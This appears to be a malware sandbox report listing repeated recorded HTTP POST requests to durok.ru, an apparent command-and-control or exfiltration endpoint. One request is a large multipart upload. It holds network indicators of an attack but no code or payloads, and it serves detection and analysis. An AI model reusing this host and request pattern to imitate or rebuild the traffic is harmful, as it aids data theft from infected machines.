                    Source: global traffic | HTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: durok.ru | Content-Length: 2128 | Expect: 100-continue
                    Source: global traffic | HTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----vFxcW3kj68Y95SNWcK2HlrJWzuTAkIi5Xg | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: durok.ru | Content-Length: 120494 | Expect: 100-continue
                    Source: global traffic | HTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: durok.ru | Content-Length: 2548 | Expect: 100-continue
                    Source: global traffic | HTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: durok.ru | Content-Length: 2128 | Expect: 100-continue
                    Source: global traffic | HTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: durok.ru | Content-Length: 2548 | Expect: 100-continue
                    Source: global traffic | HTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: durok.ru | Content-Length: 2116 | Expect: 100-continue
                    Source: global traffic | HTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: durok.ru | Content-Length: 2548 | Expect: 100-continue
                    Source: global traffic | HTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: durok.ru | Content-Length: 2548 | Expect: 100-continue
                    Source: global traffic | HTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: durok.ru | Content-Length: 2128 | Expect: 100-continue
                    Source: global traffic | HTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: durok.ru | Content-Length: 2548 | Expect: 100-continue
                    Source: global traffic | HTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: durok.ru | Content-Length: 2092 | Expect: 100-continue
                    Source: global traffic | HTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: durok.ru | Content-Length: 2548 | Expect: 100-continue
                    Source: global traffic | HTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: durok.ru | Content-Length: 2548 | Expect: 100-continue
                    Source: global traffic | HTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: durok.ru | Content-Length: 2108 | Expect: 100-continue
                    Source: global traffic | HTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: durok.ru | Content-Length: 2548 | Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2108Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2108Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2116Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2544Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2108Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2108Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2108Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2108Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2108Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2092Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2108Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continue
